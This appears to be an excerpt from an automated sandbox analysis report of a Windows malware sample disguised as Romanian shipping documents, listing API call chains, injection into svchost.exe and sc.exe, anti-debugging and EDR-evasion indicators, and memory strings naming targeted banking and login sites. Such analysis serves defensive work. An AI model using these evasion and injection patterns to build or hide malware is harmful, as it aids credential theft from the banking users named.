Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DC6222 push ds; iretd	6_2_02DC6273
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DD6891 push ss; iretd	6_2_02DD689B
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DD51F5 push 0000005Ch; iretd	6_2_02DD5201
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DD4EB2 push esi; retf	6_2_02DD4EBD
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DD0CC7 push esp; ret	6_2_02DD0CC8
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DD848E push cs; iretd	6_2_02DD84A3
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DC7450 push ds; retf	6_2_02DC7451
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DC9C50 push cs; ret	6_2_02DC9C51
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_039F09AD push ecx; mov dword ptr [esp], ecx	7_2_039F09B6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0322A2F3 push es; retf	7_2_0322A306
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0322A139 push esi; ret	7_2_0322A14B
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0322A140 push esi; ret	7_2_0322A14B
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_032261FC push cs; iretd	7_2_03226211

Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe

Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009A48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_009A48D7
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A25376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00A25376

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009C3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_009C3187

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	API/Special instruction interceptor: Address: 131779C
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FF90818D324
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FF90818D7E4
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FF90818D944
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FF90818D504
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FF90818D544
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FF90818D1E4
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FF908190154
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FF90818DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0367096E rdtsc

2_2_0367096E

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105972

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	API coverage: 4.9 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\sc.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\sc.exe TID: 7912

Thread sleep time: -48000s >= -30000s

Source: C:\Windows\SysWOW64\sc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A0445A
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0C6D1 FindFirstFileW,FindClose,	0_2_00A0C6D1
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00A0C75C
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A0EF95
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A0F0F2
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A0F3F3
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A037EF
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A03B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A03B12
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A0BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A0BCBC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0322CA10 FindFirstFileW,FindNextFileW,FindClose,	7_2_0322CA10

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009A49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009A49A0

Source: 04j58b6g.7.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: 04j58b6g.7.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: 04j58b6g.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: 04j58b6g.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: 04j58b6g.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: 04j58b6g.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: 04j58b6g.7.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: 04j58b6g.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: 04j58b6g.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: sc.exe, 00000007.00000002.2583431211.000000000346E000.00000004.00000020.00020000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2584391028.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2309364312.0000029E4E80C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 04j58b6g.7.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: 04j58b6g.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: 04j58b6g.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: 04j58b6g.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: 04j58b6g.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: AWB_5771388044 Documente de expediere.exe, 00000000.00000002.1380998095.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareworkstation.exeS
Source: 04j58b6g.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: 04j58b6g.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: 04j58b6g.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: 04j58b6g.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: 04j58b6g.7.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: 04j58b6g.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: 04j58b6g.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: 04j58b6g.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: 04j58b6g.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: 04j58b6g.7.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: 04j58b6g.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: 04j58b6g.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: 04j58b6g.7.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: 04j58b6g.7.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: 04j58b6g.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: 04j58b6g.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: 04j58b6g.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

API call chain: ExitProcess graph end node

graph_0-104706

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0367096E rdtsc

2_2_0367096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417DA3 LdrLoadDll,

2_2_00417DA3

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A13F09 BlockInput,

0_2_00A13F09

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009A3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_009A3B3A

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009D5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_009D5A7C

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009A4B37 LoadLibraryA,GetProcAddress,

0_2_009A4B37

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_013163E8 mov eax, dword ptr fs:[00000030h]	0_2_013163E8
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_01317A08 mov eax, dword ptr fs:[00000030h]	0_2_01317A08
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_01317A68 mov eax, dword ptr fs:[00000030h]	0_2_01317A68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]	2_2_036D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]	2_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]	2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]	2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]	2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]	2_2_0362C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]	2_2_03650310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]	2_2_036663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]	2_2_036EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]	2_2_036B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]	2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]	2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]	2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]	2_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]	2_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]	2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]	2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]	2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]	2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]	2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]	2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]	2_2_0362826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]	2_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]	2_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]	2_2_0362A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]	2_2_03636259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]	2_2_0362823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]	2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]	2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]	2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]	2_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]	2_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]	2_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]	2_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]	2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]	2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]	2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]	2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]	2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]	2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]	2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]	2_2_036C4144
